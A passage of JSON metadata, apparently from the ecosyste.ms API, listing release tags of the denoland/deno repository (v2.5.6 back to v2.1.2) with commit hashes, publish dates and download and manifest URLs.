es/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc